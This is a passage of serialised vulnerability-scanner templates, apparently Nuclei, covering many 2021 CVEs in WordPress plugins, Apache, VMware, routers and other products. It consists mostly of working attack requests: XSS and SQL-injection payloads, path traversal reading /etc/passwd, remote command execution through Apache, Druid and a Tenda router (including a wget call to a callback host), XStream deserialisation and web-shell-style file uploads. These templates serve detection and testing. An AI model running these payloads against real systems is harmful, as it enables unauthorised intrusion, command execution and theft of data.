reference='../../../databinding/stubHandlers/entry/method'/>\n            <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n              <owner reference='../../../..'/>\n              <method reference='../../../../databinding/stubHandlers/entry/method'/>\n              <isVoid>false</isVoid>\n              <isOneway>false</isOneway>\n            </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n          </entry>\n        </methodHandlers>\n      </handler>\n    </dynamic-proxy>\n    <string>ldap://{{interactsh-url}}/#evil</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24498","info":{"name":"WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(1)><","Calendar Details"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24666","info":{"name":"WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["66a82937a7660b73b00d4f7cefee6c85","\"service_id\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42013","info":{"name":"Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n\n"],"stop-at-first-match":true,"unsafe":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-42013"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-28937","info":{"name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.html"],"matchers-condition":"and","matchers":[{"type":"word","words":["Password Setting","addCfg('username'","addCfg('newpass'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35265","info":{"name":"MaxSite CMS > V106 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E","{{BaseURL}}/page/1%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>"]},{"type":"word","part":"body","words":["mso-comments-rss\">RSS</a>","MaxSite CMS","feed\"><span>RSS</span>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37589","info":{"name":"Virtua Software Cobranca <12R - Blind SQL Injection","severity":"high"},"requests":[{"raw":["POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario='&idsenha=test&tipousr=Usuario\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario=''&idsenha=a&tipousr=Usuario\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3, \"Os parametros n\u00e3o est\u00e3o informados corretamente\")","contains(body_3, \"O CNPJ dos parametro n\u00e3o est\u00e1 informado corretamente\")"],"condition":"or"},{"type":"dsl","dsl":["status_code_2 == 500 && status_code_3 == 200"]}]}]},{"id":"CVE-2021-3378","info":{"name":"FortiLogger 4.4.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: application/json\nReferer: {{BaseURL}}\nConnection: close\nX-Requested-With: XMLHttpRequest\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"file\"; filename=\"poc.txt\"\nContent-Type: image/png\n\n{{randstr}}\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n","GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"word","part":"header","words":["text/plain","ASP.NET"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44077","info":{"name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/RestAPI/ImportTechnicians"],"matchers-condition":"and","matchers":[{"type":"word","words":["<form name=\"ImportTechnicians\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24987","info":{"name":"WordPress Super Socializer <7.13.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"facebook_urls\":[[\"<img src=x onerror=alert(document.domain)>\"]]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24910","info":{"name":"WordPress Transposh Translation <1.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","{\"result\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24495","info":{"name":"Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>","{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><svg/onload=alert('{{randstr}}')>","alert(/{{randstr}}/)"],"condition":"or"},{"type":"word","words":["Marmoset Viewer"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41951","info":{"name":"Resourcespace - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["TEST<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43725","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>","name=\"data[performredirect]"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-1497","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /auth/change HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n","POST /auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-46072","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_service HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1\n","GET /admin/?page=maintenance/services HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-25112","info":{"name":"WordPress WHMCS Bridge <6.4b - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<strong><img src onerror=alert(document.domain)></strong>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25078","info":{"name":"Affiliates Manager < 2.9.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /?wpam_id=1 HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: <img src onerror=alert(document.domain)>\n","GET /wp-admin/admin.php?page=wpam-clicktracking HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200 && status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"<img src onerror=alert(document.domain)>\")","contains(body_3, \"Affiliates Manager Click Tracking\")"],"condition":"and"}]}]},{"id":"CVE-2021-27670","info":{"name":"Appspace 6.2.4 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24731","info":{"name":"Pie Register < 3.7.1.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-json/pie/v1/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nuser_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"User credentials are invalid.\")"],"condition":"and"}]}]},{"id":"CVE-2021-21799","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Telnet </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31249","info":{"name":"CHIYU TCP/IP Converter - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: setting.htm","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-23241","info":{"name":"MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginLess/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40868","info":{"name":"Cloudron 6.2 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33564","info":{"name":"Ruby Dragonfly <1.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==","{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44528","info":{"name":"Open Redirect in Host Authorization Middleware","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: //interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[301,302,307,308]}]}]},{"id":"CVE-2021-25646","info":{"name":"Apache Druid - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /druid/indexer/v1/sampler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"type\":\"index\",\n\"spec\":{\n   \"ioConfig\":{\n      \"type\":\"index\",\n      \"firehose\":{\n         \"type\":\"local\",\n         \"baseDir\":\"/etc\",\n         \"filter\":\"passwd\"\n      }\n   },\n   \"dataSchema\":{\n      \"dataSource\":\"odgjxrrrePz\",\n      \"parser\":{\n         \"parseSpec\":{\n            \"format\":\"javascript\",\n            \"timestampSpec\":{\n\n            },\n            \"dimensionsSpec\":{\n\n            },\n            \"function\":\"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\\"/bin/sh`@~-c`@~cat /etc/passwd\\\".split(\\\"`@~\\\")).getInputStream()).useDelimiter(\\\"\\\\A\\\").next();return {timestamp:\\\"4137368\\\",OQtGXcxBVQVL: hTVCCerYZ}}\",\n            \"\":{\n               \"enabled\":\"true\"\n            }\n         }\n      }\n   }\n},\n\"samplerConfig\":{\n   \"numRows\":10\n}\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["numRowsRead","numRowsIndexed"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24150","info":{"name":"WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.oast.me')}}\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25079","info":{"name":"Contact Form Entries < 1.2.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ez2u4g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'contact-form')"],"condition":"and"}]}]},{"id":"CVE-2021-42551","info":{"name":"NetBiblio WebOPAC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x","{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SearchTerm: 'x'+alert(1)+'x',","SearchTerm: 'x\\\\'+alert(1),//',"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["NetBiblio"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3297","info":{"name":"Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /status.htm HTTP/1.1\nHost: {{Hostname}}\nCookie: language=en; login=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Running Time","Firmware Version","Firmware Build Time"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22005","info":{"name":"VMware vCenter Server - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\ntest_data\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 201","contains(body_1, 'VMware vSphere')","content_length_2 == 0"],"condition":"and"}]}]},{"id":"CVE-2021-24387","info":{"name":"WordPress Pro Real Estate 7 Theme <3.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","/wp-content/themes/realestate"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34370","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-21973","info":{"name":"VMware vSphere - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1\nHost: {{Hostname}}\nVcip: {{interactsh-url}}\nVcpassword: {{rand_base(6)}}\nVcusername: {{rand_base(6)}}\nReqresource: {{rand_base(6)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The server sent HTTP status code 200"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24235","info":{"name":"WordPress Goto Tour & Travel Theme <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["input/Autofocus/%0D*/Onfocus=alert(123);","goto-tour-list-js-extra"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29156","info":{"name":"LDAP Injection In OpenAM","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/ui/PWResetUserValidation","{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation","{{BaseURL}}/ui/PWResetUserValidation"],"matchers":[{"type":"dsl","dsl":["contains(body, \"jato.pageSession\") && status_code==200"]}]}]},{"id":"CVE-2021-31755","info":{"name":"Tenda Router AC11 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /goform/setmac HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/index.htmlr\nContent-Type: application/x-www-form-urlencoded\n\nmodule1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-42567","info":{"name":"Apereo CAS Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cas/v1/tickets/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img/src/onerror=alert(document.domain)>","java.util.HashMap"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-24145","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"feed\"; filename=\"{{randstr}}.php\"\nContent-Type: text/csv\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"mec-ix-action\"\n\nimport-start-bookings\n-----------------------------132370916641787807752589698875--\n","GET /wp-content/uploads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2021-35250","info":{"name":"SolarWinds Serv-U 15.3 - Directory Traversal","severity":"high"},"requests":[{"raw":["POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n/?Command=NOOP\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-24389","info":{"name":"WordPress FoodBakery <2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40960","info":{"name":"Galera WebTemplate 1.0 Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38314","info":{"name":"WordPress Redux Framework <=4.2.11 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body)<50"]},{"type":"regex","name":"meme","part":"body","regex":["[a-f0-9]{32}"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["[a-f0-9]{32}"],"part":"body"}]}]},{"id":"CVE-2021-21389","info":{"name":"BuddyPress REST API  <7.2.1 - Privilege Escalation/Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-json/buddypress/v1/signup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\n  \"user_login\":\"{{randstr}}\",\n  \"password\":\"{{randstr}}\",\n  \"user_name\":\"{{randstr}}\",\n  \"user_email\":\"{{randstr}}@interact.sh\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["user_login","registered","activation_key","user_email"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37573","info":{"name":"Tiny Java Web Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<H2>404 te<img src=x onerror=alert(42)>st not found</H2>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-42667","info":{"name":"Online Event Booking and Reservation System 2.3.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET 